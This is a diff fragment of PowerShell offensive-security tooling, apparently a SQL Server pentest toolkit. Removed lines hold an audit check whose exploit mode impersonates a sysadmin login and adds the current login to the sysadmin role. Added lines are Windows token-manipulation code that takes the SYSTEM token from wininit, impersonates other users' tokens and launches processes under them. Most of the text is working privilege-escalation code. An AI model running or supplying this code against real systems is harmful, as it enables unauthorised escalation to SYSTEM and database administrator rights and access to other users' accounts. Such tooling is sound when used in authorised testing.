Error code: $ErrorCode" + } } else { - Write-Verbose -Message "$Instance : CONNECTION SUCCESS." + $Success = $OpenThreadToken.Invoke($hThread, $TokenPrivs, $false, [Ref]$hThreadToken) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + if (($ErrorCode -ne $Win32Constants.ERROR_NO_TOKEN) -and #This error is returned when the thread isn't impersonated + ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER)) #Probably means the thread was closed + { + Write-Warning "Failed to call OpenThreadToken for ThreadId: $ThreadId. Error code: $ErrorCode" + } + } + else + { + if($Instance){ + Write-Verbose "$Instance : Successfully queried thread token" + }else{ + Write-Verbose "Successfully queried thread token" + } + } + + #Close the handle to hThread (the thread handle) + if (-not $CloseHandle.Invoke($hThread)) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "Failed to close thread handle, this is unexpected. ErrorCode: $ErrorCode" + } + $hThread = [IntPtr]::Zero } - # Grab server information - $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $CurrentLogin = $ServerInfo.CurrentLogin + $RetStruct | Add-Member -MemberType NoteProperty -Name hThreadToken -Value $hThreadToken + return $RetStruct + } - # --------------------------------------------------------------- - # Set function meta data for report output - # --------------------------------------------------------------- - if($Exploit) + + #Gets important information about the token such as the logon type associated with the logon + function Get-TokenInformation + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $hToken + ) + + $ReturnObj = $null + + $TokenStatsSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_STATISTICS) + [IntPtr]$TokenStatsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenStatsSize) + [UInt32]$RealSize = 0 + $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenStatistics, $TokenStatsPtr, $TokenStatsSize, [Ref]$RealSize) + if (-not $Success) { - $TestMode = 'Exploit' + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "GetTokenInformation failed. Error code: $ErrorCode" } else { - $TestMode = 'Audit' - } - $Vulnerability = 'Excessive Privilege - Impersonate Login' - $Description = 'The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges.' - $Remediation = 'Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]' - $Severity = 'High' - $IsVulnerable = 'No' - $IsExploitable = 'No' - $Exploited = 'No' - $ExploitCmd = "Invoke-SQLAuditPrivImpersonateLogin -Instance $Instance -Exploit" - $Details = '' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms181362.aspx' - $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' + $TokenStats = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenStatsPtr, [Type]$TOKEN_STATISTICS) - # --------------------------------------------------------------- - # Check for Vulnerability - # --------------------------------------------------------------- + #Query LSA to determine what the logontype of the session is that the token corrosponds to, as well as the username/domain of the logon + $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenStats.AuthenticationId, $LuidPtr, $false) - # Get list of SQL Server logins that can be impersonated by the current login - $ImpersonationList = Get-SQLServerPriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.PermissionName -like 'IMPERSONATE' - } + [IntPtr]$LogonSessionDataPtr = [IntPtr]::Zero + $ReturnVal = $LsaGetLogonSessionData.Invoke($LuidPtr, [Ref]$LogonSessionDataPtr) + if ($ReturnVal -ne 0 -and $LogonSessionDataPtr -eq [IntPtr]::Zero) + { + Write-Warning "Call to LsaGetLogonSessionData failed. Error code: $ReturnVal. LogonSessionDataPtr = $LogonSessionDataPtr" + } + else + { + $LogonSessionData = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LogonSessionDataPtr, [Type]$SECURITY_LOGON_SESSION_DATA) + if ($LogonSessionData.Username.Buffer -ne [IntPtr]::Zero -and + $LogonSessionData.LoginDomain.Buffer -ne [IntPtr]::Zero) + { + #Get the username and domainname associated with the token + $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.Username.Buffer, $LogonSessionData.Username.Length/2) + $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.LoginDomain.Buffer, $LogonSessionData.LoginDomain.Length/2) + + #If UserName is for the computer account, figure out what account it actually is (SYSTEM, NETWORK SERVICE) + #Only do this for the computer account because other accounts return correctly. Also, doing this for a domain account + #results in querying the domain controller which is unwanted. + if ($Username -ieq "$($env:COMPUTERNAME)`$") + { + [UInt32]$Size = 100 + [UInt32]$NumUsernameChar = $Size / 2 + [UInt32]$NumDomainChar = $Size / 2 + [UInt32]$SidNameUse = 0 + $UsernameBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size) + $DomainBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size) + $Success = $LookupAccountSidW.Invoke([IntPtr]::Zero, $LogonSessionData.Sid, $UsernameBuffer, [Ref]$NumUsernameChar, $DomainBuffer, [Ref]$NumDomainChar, [Ref]$SidNameUse) + + if ($Success) + { + $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($UsernameBuffer) + $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($DomainBuffer) + } + else + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "Error calling LookupAccountSidW. Error code: $ErrorCode" + } - # Check if any SQL Server logins can be impersonated - if($ImpersonationList) - { - # Status user - Write-Verbose -Message "$Instance : - Logins can be impersonated." - $IsVulnerable = 'Yes' + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UsernameBuffer) + $UsernameBuffer = [IntPtr]::Zero + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($DomainBuffer) + $DomainBuffer = [IntPtr]::Zero + } - # --------------------------------------------------------------- - # Check if Vulnerability is Exploitable - # --------------------------------------------------------------- + $ReturnObj = New-Object PSObject + $ReturnObj | Add-Member -Type NoteProperty -Name Domain -Value $Domain + $ReturnObj | Add-Member -Type NoteProperty -Name Username -Value $Username + $ReturnObj | Add-Member -Type NoteProperty -Name hToken -Value $hToken + $ReturnObj | Add-Member -Type NoteProperty -Name LogonType -Value $LogonSessionData.LogonType - # Iterate through each affected login and check if they are a sysadmin - $ImpersonationList | - ForEach-Object -Process { - # Grab grantee and impersonable login - $ImpersonatedLogin = $_.ObjectName - $GranteeName = $_.GranteeName - # Check if impersonable login is a sysadmin - $ImpLoginSysadminStatus = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$ImpersonatedLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - If($ImpLoginSysadminStatus -eq 1) - { - #Status user - Write-Verbose -Message "$Instance : - $GranteeName can impersonate the $ImpersonatedLogin sysadmin login." - $IsExploitable = 'Yes' - $Details = "$GranteeName can impersonate the $ImpersonatedLogin SYSADMIN login. This test was ran with the $CurrentLogin login." + #Query additional info about the token such as if it is elevated + $ReturnObj | Add-Member -Type NoteProperty -Name IsElevated -Value $false - # --------------------------------------------------------------- - # Exploit Vulnerability - # --------------------------------------------------------------- - if($Exploit) + $TokenElevationSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_ELEVATION) + $TokenElevationPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenElevationSize) + [UInt32]$RealSize = 0 + $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenElevation, $TokenElevationPtr, $TokenElevationSize, [Ref]$RealSize) + if (-not $Success) { - # Status user - Write-Verbose -Message "$Instance : - EXPLOITING: Starting exploit process..." + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "GetTokenInformation failed to retrieve TokenElevation status. ErrorCode: $ErrorCode" + } + else + { + $TokenElevation = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenelevationPtr, [Type]$TOKEN_ELEVATION) + if ($TokenElevation.TokenIsElevated -ne 0) + { + $ReturnObj.IsElevated = $true + } + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenElevationPtr) - # Check if user is already a sysadmin - $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - if($SysadminPreCheck -eq 0) + + #Query the token type to determine if the token is a primary or impersonation token + $ReturnObj | Add-Member -Type NoteProperty -Name TokenType -Value "UnableToRetrieve" + + [UInt32]$TokenTypeSize = 4 + [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypeSize) + [UInt32]$RealSize = 0 + $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenType, $TokenTypePtr, $TokenTypeSize, [Ref]$RealSize) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode" + } + else + { + [UInt32]$TokenType = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenTypePtr, [Type][UInt32]) + switch($TokenType) { - # Status user - Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." - Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by impersonating $ImpersonatedLogin..." + 1 {$ReturnObj.TokenType = "Primary"} + 2 {$ReturnObj.TokenType = "Impersonation"} + } + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr) - # Attempt to add the current login to sysadmins fixed server role - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert" -SuppressVerbose - # Verify the login was added successfully - $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - if($SysadminPostCheck -eq 1) + #Query the impersonation level if the token is an Impersonation token + if ($ReturnObj.TokenType -ieq "Impersonation") + { + $ReturnObj | Add-Member -Type NoteProperty -Name ImpersonationLevel -Value "UnableToRetrieve" + + [UInt32]$ImpersonationLevelSize = 4 + [IntPtr]$ImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ImpersonationLevelSize) #sizeof uint32 + [UInt32]$RealSize = 0 + $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenImpersonationLevel, $ImpersonationLevelPtr, $ImpersonationLevelSize, [Ref]$RealSize) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode" + } + else + { + [UInt32]$ImpersonationLevel = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImpersonationLevelPtr, [Type][UInt32]) + switch ($ImpersonationLevel) { - Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" - $Exploited = 'Yes' + 0 { $ReturnObj.ImpersonationLevel = "SecurityAnonymous" } + 1 { $ReturnObj.ImpersonationLevel = "SecurityIdentification" } + 2 { $ReturnObj.ImpersonationLevel = "SecurityImpersonation" } + 3 { $ReturnObj.ImpersonationLevel = "SecurityDelegation" } + } + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ImpersonationLevelPtr) + } + + + #Query the token sessionid + $ReturnObj | Add-Member -Type NoteProperty -Name SessionID -Value "Unknown" + + [UInt32]$TokenSessionIdSize = 4 + [IntPtr]$TokenSessionIdPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenSessionIdSize) + [UInt32]$RealSize = 0 + $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenSessionId, $TokenSessionIdPtr, $TokenSessionIdSize, [Ref]$RealSize) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode" + } + else + { + [UInt32]$TokenSessionId = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenSessionIdPtr, [Type][UInt32]) + $ReturnObj.SessionID = $TokenSessionId + } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenSessionIdPtr) + + + #Query the token privileges + $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesEnabled -Value @() + $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesAvailable -Value @() + + [UInt32]$TokenPrivilegesSize = 1000 + [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesSize) + [UInt32]$RealSize = 0 + $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenPrivileges, $TokenPrivilegesPtr, $TokenPrivilegesSize, [Ref]$RealSize) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode" + } + else + { + $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) + + #Loop through each privilege + [IntPtr]$PrivilegesBasePtr = [IntPtr](Add-SignedIntAsUnsigned $TokenPrivilegesPtr ([System.Runtime.InteropServices.Marshal]::OffsetOf([Type]$TOKEN_PRIVILEGES, "Privileges"))) + $LuidAndAttributeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) + for ($i = 0; $i -lt $TokenPrivileges.PrivilegeCount; $i++) + { + $LuidAndAttributePtr = [IntPtr](Add-SignedIntAsUnsigned $PrivilegesBasePtr ($LuidAndAttributeSize * $i)) + + $LuidAndAttribute = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributePtr, [Type]$LUID_AND_ATTRIBUTES) + + #Lookup privilege name + [UInt32]$PrivilegeNameSize = 60 + $PrivilegeNamePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PrivilegeNameSize) + $PLuid = $LuidAndAttributePtr #The Luid structure is the first object in the LuidAndAttributes structure, so a ptr to LuidAndAttributes also points to Luid + + $Success = $LookupPrivilegeNameW.Invoke([IntPtr]::Zero, $PLuid, $PrivilegeNamePtr, [Ref]$PrivilegeNameSize) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "Call to LookupPrivilegeNameW failed. Error code: $ErrorCode. RealSize: $PrivilegeNameSize" + } + $PrivilegeName = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($PrivilegeNamePtr) + + #Get the privilege attributes + $PrivilegeStatus = "" + $Enabled = $false + + if ($LuidAndAttribute.Attributes -eq 0) + { + $Enabled = $false + } + if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) -eq $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) #enabled by default + { + $Enabled = $true + } + if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED) -eq $Win32Constants.SE_PRIVILEGE_ENABLED) #enabled + { + $Enabled = $true + } + if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_REMOVED) -eq $Win32Constants.SE_PRIVILEGE_REMOVED) #SE_PRIVILEGE_REMOVED. This should never exist. Write a warning if it is found so I can investigate why/how it was found. + { + Write-Warning "Unexpected behavior: Found a token with SE_PRIVILEGE_REMOVED. Please report this as a bug. " + } + + if ($Enabled) + { + $ReturnObj.PrivilegesEnabled += ,$PrivilegeName } else { - Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." + $ReturnObj.PrivilegesAvailable += ,$PrivilegeName } - } - else - { - # Status user - Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed." - $Exploited = 'No' + + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($PrivilegeNamePtr) } } + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) + } else { - # Status user - Write-Verbose -Message "$Instance : - $GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin)." - $Details = "$GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin). This test was ran with the $CurrentLogin login." - $IsExploitable = 'No' + Write-Verbose "Call to LsaGetLogonSessionData succeeded. This SHOULD be SYSTEM since there is no data. $($LogonSessionData.UserName.Length)" + } + + #Free LogonSessionData + $ntstatus = $LsaFreeReturnBuffer.Invoke($LogonSessionDataPtr) + $LogonSessionDataPtr = [IntPtr]::Zero + if ($ntstatus -ne 0) + { + Write-Warning "Call to LsaFreeReturnBuffer failed. Error code: $ntstatus" + } + } + + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) + $LuidPtr = [IntPtr]::Zero + } + + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenStatsPtr) + $TokenStatsPtr = [IntPtr]::Zero + + return $ReturnObj + } + + + #Takes an array of TokenObjects built by the script and returns the unique ones + function Get-UniqueTokens + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [Object[]] + $AllTokens + ) + + $TokenByUser = @{} + $TokenByEnabledPriv = @{} + $TokenByAvailablePriv = @{} + + #Filter tokens by user + foreach ($Token in $AllTokens) + { + $Key = $Token.Domain + "\" + $Token.Username + if (-not $TokenByUser.ContainsKey($Key)) + { + #Filter out network logons and junk Windows accounts. This filter eliminates accounts which won't have creds because + # they are network logons (type 3) or logons for which the creds don't matter like LOCOAL SERVICE, DWM, etc.. + if ($Token.LogonType -ne 3 -and + $Token.Username -inotmatch "^DWM-\d+$" -and + $Token.Username -inotmatch "^LOCAL\sSERVICE$") + { + $TokenByUser.Add($Key, $Token) + } + } + else + { + #If Tokens have equal elevation levels, compare their privileges. + if($Token.IsElevated -eq $TokenByUser[$Key].IsElevated) + { + if (($Token.PrivilegesEnabled.Count + $Token.PrivilegesAvailable.Count) -gt ($TokenByUser[$Key].PrivilegesEnabled.Count + $TokenByUser[$Key].PrivilegesAvailable.Count)) + { + $TokenByUser[$Key] = $Token + } + } + #If the new token is elevated and the current token isn't, use the new token + elseif (($Token.IsElevated -eq $true) -and ($TokenByUser[$Key].IsElevated -eq $false)) + { + $TokenByUser[$Key] = $Token + } + } + } + + #Filter tokens by privilege + foreach ($Token in $AllTokens) + { + $Fullname = "$($Token.Domain)\$($Token.Username)" + + #Filter currently enabled privileges + foreach ($Privilege in $Token.PrivilegesEnabled) + { + if ($TokenByEnabledPriv.ContainsKey($Privilege)) + { + if($TokenByEnabledPriv[$Privilege] -notcontains $Fullname) + { + $TokenByEnabledPriv[$Privilege] += ,$Fullname + } + } + else + { + $TokenByEnabledPriv.Add($Privilege, @($Fullname)) + } + } + + #Filter currently available (but not enable) privileges + foreach ($Privilege in $Token.PrivilegesAvailable) + { + if ($TokenByAvailablePriv.ContainsKey($Privilege)) + { + if($TokenByAvailablePriv[$Privilege] -notcontains $Fullname) + { + $TokenByAvailablePriv[$Privilege] += ,$Fullname + } } + else + { + $TokenByAvailablePriv.Add($Privilege, @($Fullname)) + } + } + } + + $ReturnDict = @{ + TokenByUser = $TokenByUser + TokenByEnabledPriv = $TokenByEnabledPriv + TokenByAvailablePriv = $TokenByAvailablePriv + } + + return (New-Object PSObject -Property $ReturnDict) + } + + + function Invoke-ImpersonateUser + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $hToken + ) + + #Duplicate the token so it can be used to create a new process + [IntPtr]$NewHToken = [IntPtr]::Zero + $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) #todo does this need to be freed + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "DuplicateTokenEx failed. ErrorCode: $ErrorCode" + } + else + { + $Success = $ImpersonateLoggedOnUser.Invoke($NewHToken) + if (-not $Success) + { + $Errorcode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "Failed to ImpersonateLoggedOnUser. Error code: $Errorcode" + } + } + + $Success = $CloseHandle.Invoke($NewHToken) + $NewHToken = [IntPtr]::Zero + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode" + } + + return $Success + } + + + function Create-ProcessWithToken + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $hToken, + + [Parameter(Position=1, Mandatory=$true)] + [String] + $ProcessName, + + [Parameter(Position=2)] + [String] + $ProcessArgs, + + [Parameter(Position=3)] + [Switch] + $PassThru + ) + Write-Verbose "Entering Create-ProcessWithToken" + #Duplicate the token so it can be used to create a new process + [IntPtr]$NewHToken = [IntPtr]::Zero + $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "DuplicateTokenEx failed. ErrorCode: $ErrorCode" + } + else + { + $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO) + [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize) + $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null + [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct + + $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION) + [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize) + + $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("$ProcessName") + $ProcessArgsPtr = [IntPtr]::Zero + if (-not [String]::IsNullOrEmpty($ProcessArgs)) + { + $ProcessArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("`"$ProcessName`" $ProcessArgs") + } + + $FunctionName = "" + if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0) + { + #Cannot use CreateProcessWithTokenW when in Session0 because CreateProcessWithTokenW throws an ACCESS_DENIED error. I believe it is because + #this API attempts to modify the desktop ACL. I would just use this API all the time, but it requires that I enable SeAssignPrimaryTokenPrivilege + #which is not ideal. + Write-Verbose "Running in Session 0. Enabling SeAssignPrimaryTokenPrivilege and calling CreateProcessAsUserW to create a process with alternate token." + Enable-Privilege -Privilege SeAssignPrimaryTokenPrivilege + $Success = $CreateProcessAsUserW.Invoke($NewHToken, $ProcessNamePtr, $ProcessArgsPtr, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) + $FunctionName = "CreateProcessAsUserW" + } + else + { + Write-Verbose "Not running in Session 0, calling CreateProcessWithTokenW to create a process with alternate token." + $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) + $FunctionName = "CreateProcessWithTokenW" + } + if ($Success) + { + #Free the handles returned in the ProcessInfo structure + $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION) + $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null + $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null + + #Pass created System.Diagnostics.Process object to pipeline + if ($PassThru) { + #Retrieving created System.Diagnostics.Process object + $returnProcess = Get-Process -Id $ProcessInfo.dwProcessId + + #Caching process handle so we don't lose it when the process exits + $null = $returnProcess.Handle + + #Passing System.Diagnostics.Process object to pipeline + $returnProcess + } + } + else + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "$FunctionName failed. Error code: $ErrorCode" + } - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + #Free StartupInfo memory and ProcessInfo memory + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr) + $StartupInfoPtr = [Intptr]::Zero + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr) + $ProcessInfoPtr = [IntPtr]::Zero + [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr) + $ProcessNamePtr = [IntPtr]::Zero + + #Close handle for the token duplicated with DuplicateTokenEx + $Success = $CloseHandle.Invoke($NewHToken) + $NewHToken = [IntPtr]::Zero + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode" } } - else - { - # Status user - Write-Verbose -Message "$Instance : - No logins could be impersonated." - } - - # Status user - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" } - End + + function Free-AllTokens { - # Return data - if ( -not $NoOutput) + Param( + [Parameter(Position=0, Mandatory=$true)] + [PSObject[]] + $TokenInfoObjs + ) + + foreach ($Obj in $TokenInfoObjs) { - Return $TblData + $Success = $CloseHandle.Invoke($Obj.hToken) + if (-not $Success) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Verbose "Failed to close token handle in Free-AllTokens. ErrorCode: $ErrorCode" + } + $Obj.hToken = [IntPtr]::Zero } } -} -# --------------------------------------- -# Invoke-SQLAuditSampleDataByColumn -# --------------------------------------- -# Author: Scott Sutherland -Function Invoke-SQLAuditSampleDataByColumn -{ - <# - .SYNOPSIS - Check if the current login can access any database columns that contain the word password. Supports column name keyword search and custom data sample size. - Note: For cleaner data sample output use the Get-SQLColumnSampleData function. - .PARAMETER Username - SQL Server or domain account to authenticate with. - .PARAMETER Password - SQL Server or domain account password to authenticate with. - .PARAMETER Credential - SQL Server credential. - .PARAMETER Instance - SQL Server instance to connection to. - .PARAMETER NoOutput - Don't output anything. - .PARAMETER Exploit - Exploit vulnerable issues - .PARAMETER SampleSize - Number of records to sample. - .PARAMETER Keyword - Column name to search for. - .PARAMETER Exploit - Exploit vulnerable issues. - .EXAMPLE - PS C:\> Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\STANDARDDEV2014 -Keyword card -SampleSize 2 -Exploit + #Enumerate all tokens on the system. Returns an array of objects with the token and information about the token. + function Enum-AllTokens + { + $AllTokens = @() - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : Potentially Sensitive Columns Found - Description : Columns were found in non default databases that may contain sensitive information. - Remediation : Ensure that all passwords and senstive data are masked, hashed, or encrypted. - Severity : Informational - IsVulnerable : Yes - IsExploitable : Yes - Exploited : Yes - ExploitCmd : Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\STANDARDDEV2014 -Exploit - Details : Data sample from [testdb].[dbo].[tracking].[card] : "4111111111111111" "4111111111111112". - Reference : https://msdn.microsoft.com/en-us/library/ms188348.aspx - Author : Scott Sutherland (@_nullbind), NetSPI 2016 - #> - [CmdletBinding()] - Param( - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] - [string]$Username, + #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token. + #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token. + $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id + if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) + { + Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" + } - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] - [string]$Password, + if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero) + { + $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null + $systemTokenInfo = $null + } - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Windows credentials.')] - [System.Management.Automation.PSCredential] - [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + $ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" -and $_.name 